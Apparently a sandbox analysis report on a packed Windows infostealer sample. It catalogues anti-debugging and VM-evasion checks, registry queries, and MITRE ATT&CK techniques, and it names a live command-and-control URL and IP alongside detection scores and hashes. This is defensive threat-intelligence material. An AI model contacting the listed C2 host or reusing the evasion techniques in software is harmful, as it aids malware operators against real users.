Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CCF second address: 6E50CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CD5 second address: 6E50CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CDB second address: 6E50CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09CB second address: 6EA09E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ch, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2BDC8ABB1Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09E9 second address: 6EA09EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09EF second address: 6EA09F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09F5 second address: 6EA0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA0A10 second address: 6EA0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSpecial instruction interceptor: First address: B6B9DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00609980 rdtsc 0_2_00609980
Source: C:\Users\user\Desktop\2M43DSi2cx.exe TID: 7692Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 2M43DSi2cx.exe, 00000000.00000003.1414322461.000000000150A000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414534198.0000000001510000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414883246.000000000151D000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1425703448.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{\'
Source: 2M43DSi2cx.exeBinary or memory string: Hyper-V RAW
Source: 2M43DSi2cx.exe, 00000000.00000003.1361919011.00000000014B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 2M43DSi2cx.exe, 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 2M43DSi2cx.exe, 00000000.00000003.1368625279.0000000006721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=:9
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSystem information queried: ModuleInformation
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\2M43DSi2cx.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_06E902EF Start: 06E90572 End: 06E903110_2_06E902EF
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: NTICE
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: SICE
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00609980 rdtsc 0_2_00609980
Source: 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\2M43DSi2cx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\2M43DSi2cx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\2M43DSi2cx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\2M43DSi2cx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.10:49724 -> 185.121.15.192:80
Mitre Att&ck Matrix
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: [2] Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: [1] Process Injection; [1] DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: [24] Virtualization/Sandbox Evasion; [1] Process Injection; [1] Deobfuscate/Decode Files or Information; [3] Obfuscated Files or Information; [12] Software Packing; [1] DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: [751] Security Software Discovery; [24] Virtualization/Sandbox Evasion; [13] Process Discovery; [1] Remote System Discovery; [1] File and Directory Discovery; [216] System Information Discovery
Lateral Movement: [1] Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: [11] Archive Collected Data; [1] Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: [11] Encrypted Channel; [2] Ingress Tool Transfer; [3] Non-Application Layer Protocol; [4] Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
2M43DSi2cx.exe | 51% | Virustotal |
2M43DSi2cx.exe | 42% | ReversingLabs | Win32.Infostealer.Tinba
2M43DSi2cx.exe | 100% | Avira | TR/Crypt.TPM.Gen
2M43DSi2cx.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5ht.top | 185.121.15.192 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | 2M43DSi2cx.exe | false | | high
http://home.fivetk5ht.top/zldPR | 2M43DSi2cx.exe, 00000000.00000003.1414353733.0000000001500000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp | 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://httpbin.org/ipbefore | 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/hsts.html# | 2M43DSi2cx.exe | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514 | 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17 | 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html# | 2M43DSi2cx.exe | false | | high
https://curl.se/docs/alt-svc.html | 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4 | 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.fivetk5ht.top | Spain | 207046 | REDSERVICIOES | false
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578929
Start date and time: 2024-12-20 16:43:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2M43DSi2cx.exe (renamed because original name is a hash value)
Original Sample Name: 98f2f2f0d74571af72dd4ca43c1692bf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:44:45 | API Interceptor | 3x Sleep call for process: 2M43DSi2cx.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.121.15.192 | HZhObFuFNe.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | t6VDbnvGeN.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | 16ebsersuX.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | hUhhrsyGtz.exe | malicious | Cryptbot | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | pCElIX19tu.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | CMpuGis28l.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | 5Jat5RkD3a.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | u57m8aCdwb.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
34.226.108.155 | f9bcOz8SxR.exe | malicious | Unknown |
34.226.108.155 | 1o81tDUu5M.exe | malicious | Unknown |
34.226.108.155 | 16ebsersuX.exe | malicious | Cryptbot |
34.226.108.155 | hUhhrsyGtz.exe | malicious | Cryptbot |
34.226.108.155 | pCElIX19tu.exe | malicious | Unknown |
34.226.108.155 | 5Jat5RkD3a.exe | malicious | Unknown |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
34.226.108.155 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer |
34.226.108.155 | s3hvuz3XS0.exe | malicious | Cryptbot |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | f9bcOz8SxR.exe | malicious | Unknown | 34.226.108.155
httpbin.org | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | 1o81tDUu5M.exe | malicious | Unknown | 34.226.108.155
httpbin.org | HZhObFuFNe.exe | malicious | Unknown | 98.85.100.80
httpbin.org | t6VDbnvGeN.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | pCElIX19tu.exe | malicious | Unknown | 34.226.108.155
httpbin.org | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155
home.fivetk5ht.top | HZhObFuFNe.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | t6VDbnvGeN.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | hUhhrsyGtz.exe | malicious | Cryptbot | 185.121.15.192
home.fivetk5ht.top | pCElIX19tu.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | CMpuGis28l.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
s-part-0035.t-0009.t-msedge.net | VajVW1leCd.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 7JKssbjRDa.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | m21jm5y5Z5.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 16ebsersuX.exe | malicious | Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | f48jWpQ2F8.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | MS100384UTC.xls | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | RZnZbS97dD.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Invoice Shipment.bat.exe | malicious | DarkCloud | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | MS100384UTC.xls | malicious | Unknown | 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
REDSERVICIOES | HZhObFuFNe.exe | malicious | Unknown | 185.121.15.192
| t6VDbnvGeN.exe | malicious | Unknown | 185.121.15.192
| 16ebsersuX.exe | malicious | Cryptbot | 185.121.15.192
| hUhhrsyGtz.exe | malicious | Cryptbot | 185.121.15.192
| pCElIX19tu.exe | malicious | Unknown | 185.121.15.192
| CMpuGis28l.exe | malicious | Unknown | 185.121.15.192
| 5Jat5RkD3a.exe | malicious | Unknown | 185.121.15.192
| u57m8aCdwb.exe | malicious | Unknown | 185.121.15.192
| TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
| file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
AMAZON-AESUS | f9bcOz8SxR.exe | malicious | Unknown | 34.226.108.155
| 1o81tDUu5M.exe | malicious | Unknown | 34.226.108.155
| nshmpsl.elf | malicious | Mirai | 52.206.106.77
| DzbIZ1HRMj.zip | malicious | Unknown | 52.0.145.89
| 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155
| hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155
| pCElIX19tu.exe | malicious | Unknown | 34.226.108.155
| securedoc_20241220T070409.html | malicious | Unknown | 52.86.107.71
| 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155
| https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTA | malicious | Unknown | 3.236.206.93
                                                              No context
                                                              No context
                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.984374373130843
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 2M43DSi2cx.exe
File size: 4'483'072 bytes
MD5: 98f2f2f0d74571af72dd4ca43c1692bf
SHA1: 507cac98014412c6e697ea75f3c1941bad57df48
SHA256: dfe46285484362af5dc63dd0bba5de89c1c1d7105f7e8d05b2514fa39ac3750a
SHA512: 555b04fcb4fb1b49f35bd99bbcc9e40b85bec6fb604c71ce997a0027eb616248e0cd225de905c2d72b5e72763383438250a0063fefdf3323137e075b76cc63c5
SSDEEP: 98304:RY3zmnEwBIPSoKp8c6tY11HZ28iC53RlCPCaRFX62szGgA5:RY3zrwBIPSogP3IjKRlCbfX6s
TLSH: 672633EDA236DD52E4A002B6C2FE4B335EB490D1B6A14E583D35712BB0C3F513B5E626
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@..................................TE...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1096000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                              Instruction
                                                              jmp 00007F2BDC8D6EDAh
                                                              cmovbe eax, dword ptr [eax+eax+00h]
                                                              add byte ptr [eax], al
                                                              add cl, ch
                                                              add byte ptr [eax], ah
                                                              add byte ptr [eax], al
                                                              add byte ptr [esi], al
                                                              or al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], dh
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], ah
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              and dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              push es
                                                              or al, byte ptr [eax]
                                                              add byte ptr [edx], cl
                                                              or al, byte ptr [eax]
                                                              add byte ptr [ecx], cl
                                                              or al, byte ptr [eax]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], al
                                                              add byte ptr [eax], 00000000h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              adc byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add dword ptr [edx], ecx
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
